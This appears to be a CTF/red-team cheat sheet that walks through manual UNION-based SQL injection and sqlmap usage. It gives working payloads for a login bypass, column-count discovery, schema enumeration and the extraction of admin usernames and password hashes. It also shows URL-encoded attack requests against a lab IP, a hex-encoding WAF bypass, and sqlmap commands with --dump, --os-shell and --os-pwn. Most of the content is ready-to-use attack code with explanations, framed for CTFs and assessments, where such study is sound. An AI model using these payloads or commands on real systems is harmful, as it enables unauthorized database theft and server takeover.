SQL Injection
SQL_INJECTION
Professional Explanation of SQL Injection Payload Sequence
The following is a step-by-step breakdown of typical SQL Injection payloads used to extract information from a database via an injectable parameter, often during manual exploitation after identifying a vulnerability with tools like sqlmap.
Step-by-Step Breakdown
1. Basic Boolean Bypass
1
' OR 1=1 -- -
Purpose: Classic SQL Injection to bypass authentication or logic filters.
Mechanism:
The
'closes the original query string.OR 1=1always evaluates to true, forcing the query logic to accept the input.-- -comments out the remainder of the SQL statement to avoid syntax errors.
Example Original Query:
1
SELECT * FROM users WHERE username = '' OR 1=1 -- -' AND password = 'xyz';
This makes the WHERE clause always true, often bypassing login screens.
2. Basic UNION Injection with NULL Placeholders
1
' UNION SELECT NULL,NULL,NULL,NULL -- -
Purpose: Determines the correct number of columns for successful UNION-based SQL Injection.
Mechanism:
Closes the original query.
UNION SELECTmerges a controlled query result with the original result set.NULLvalues are placeholders to match the number of columns.-- -comments out remaining code.
Attackers repeat this with different NULL counts until no SQL error occurs, indicating the correct column count for further exploitation.
3. Enumerating Table Names
1
' UNION SELECT NULL,NULL,NULL,table_name FROM information_schema.tables -- -
Purpose: Extracts table names from the database.
Mechanism:
Once the number of columns is known (4 columns in this case), injects
table_namefrom theinformation_schema.tablessystem table.information_schema.tablescontains metadata about all tables in the database.The attacker aligns
table_namewith a visible column in the application’s output to exfiltrate table names.
4. Enumerating Column Names of a Specific Table
1
' UNION SELECT NULL,NULL,NULL,column_name FROM information_schema.columns WHERE table_name='admin' -- -
Purpose: Extracts column names for a target table, here assumed to be
"admin".Mechanism:
Targets
information_schema.columns, which holds column metadata.The
WHERE table_name='admin'clause filters columns belonging to the"admin"table.Again, aligns
column_namewith visible output to reveal column structure.
5. Extracting Sensitive Data from the Target Table
1
' UNION SELECT NULL,NULL,user,hash FROM admin -- -
Purpose: Dumps actual user data, such as usernames and password hashes, from the
"admin"table.Mechanism:
Assumes two relevant columns exist in
"admin":userandhash.Fills remaining columns with
NULLto maintain column alignment.Displays credentials or hashes in the application’s output.
6. Advanced Injection
To search from one specific user information in web
1
http://10.10.19.83/item.php?id=5%20UNION%20SELECT%201,password,3,4,5%20FROM%20users%20WHERE%20id=2
1
http://10.10.19.83/item.php?id=5%20UNION%20SELECT%201,COUNT(*),3,4,5%20FROM%20users
To find table name
1
10.10.19.83/item.php?id=5 UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5 FROM information_schema.tables WHERE table_schema=database()
To bypass WAF by hexadecimal obfuscation:
1
http://10.10.19.83/item.php?id=5%20UNION%20SELECT%201,GROUP_CONCAT(column_name),3,4,5%20FROM%20information_schema.columns%20WHERE%20table_name=0x7573657273
0x7573657273 ----> users
To find system version
1
http://10.10.19.83/item.php?id=5%20UNION%20SELECT%201,version(),3,4,5
To find database name
1
http://10.10.19.83/item.php?id=5%20UNION%20SELECT%201,database(),3,4,5
Summary of the Attack Progression
Initial Bypass: Forces true condition to bypass authentication.
Column Count Discovery: Tests different column counts for successful UNION injection.
Table Enumeration: Identifies all available tables using system metadata.
Column Enumeration: Extracts column names for specific target tables.
Data Extraction: Dumps credentials or other sensitive information.
This is a classic manual UNION-based SQL Injection sequence, allowing an attacker to escalate from basic access to full database compromise through systematic information extraction.
Additional Related Payload Variations
| Payload | Purpose |
|---|---|
' ORDER BY N -- - | Finds the number of columns by observing errors |
' UNION SELECT 1,2,3,4 -- - | Tests which columns reflect output |
' UNION SELECT NULL,@@version,NULL,NULL -- - | Reveals database version |
' UNION SELECT NULL,user(),NULL,NULL -- - | Reveals database user |
' UNION SELECT NULL,database(),NULL,NULL -- - | Reveals current database name |
This methodology is fundamental during Red Team engagements, CTFs, and vulnerability assessments where SQL Injection is present.
https://github.com/payloadbox/sql-injection-payload-list
SQL MAP
Professional Explanation of the Command
1
sqlmap -u "store.cybercrafted.thm/xxxxxx.php" --method POST --data "search=doesnt&submit=matter" -p search --batch --dump
Detailed Breakdown
sqlmap: An automated SQL Injection exploitation tool used by Red Teams, penetration testers, and security researchers to detect and exploit SQL Injection vulnerabilities in web applications.
Arguments and Options
-u "store.cybercrafted.thm/xxxxxx.php":- Target URL of the vulnerable endpoint, likely accepting user input that interacts with the backend database.
--method POST:Specifies the HTTP request method to be used.
In this case, a
POSTrequest rather than the defaultGET.
--data "search=doesnt&submit=matter":The POST request body sent to the server.
The parameter
searchis assumed to be user-controllable and vulnerable.submit=matteris likely a static parameter required for form submission.
-p search:- Explicitly tells sqlmap to test only the
searchparameter for SQL Injection, optimizing the scan and reducing noise.
- Explicitly tells sqlmap to test only the
--batch:Runs sqlmap in non-interactive mode, automatically using default answers for prompts.
Essential for scripting, automation, or CI/CD scenarios where no human intervention is desired.
--dump:- After detecting a successful SQL Injection, sqlmap will automatically dump the contents of the target database, typically extracting entire tables or databases.
How It Works
Sends crafted SQL payloads within the
searchparameter of aPOSTrequest tostore.cybercrafted.thm/xxxxxx.php.Detects the presence and type of SQL Injection vulnerability.
Upon successful exploitation, extracts data from the target database using
--dump.
This approach is commonly used to enumerate databases, tables, and potentially sensitive information (credentials, emails, etc.) during security assessments or CTF challenges.
Available Additional Arguments for sqlmap
| Argument | Description |
|---|---|
--risk=LEVEL | Defines risk level (1 to 3) for payload complexity |
--level=LEVEL | Specifies the extent of tests (1 to 5) |
--dbs | Enumerates databases only, no data dump |
--tables | Lists tables in a specific database |
--columns | Shows column names for a selected table |
--os-shell | Attempts to spawn an operating system shell if SQL Injection allows |
--os-pwn | Attempts full exploitation (reverse shell, meterpreter, etc.) |
--proxy <url> | Routes traffic through a proxy (e.g., Burp Suite) |
--threads <N> | Parallelizes requests to improve performance |
--cookie <data> | Adds custom cookies to the request |
Example Variants
Basic database enumeration:
1
sqlmap -u "http://target.com/page.php?id=1" --dbs
Specifying a cookie and using a proxy:
1
sqlmap -u "http://target.com/page.php" --cookie "PHPSESSID=abc123" --proxy "http://127.0.0.1:8080" --tables
Interactive shell exploitation:
1
sqlmap -u "http://target.com/page.php?id=1" --os-shell
Summary
This command launches an automated SQL Injection attack against a specific parameter (search) within a POST request, operating non-interactively to extract database content if successful. It is a standard, efficient, and aggressive tactic during Red Team operations, vulnerability assessments, or CTF challenges to compromise backend databases.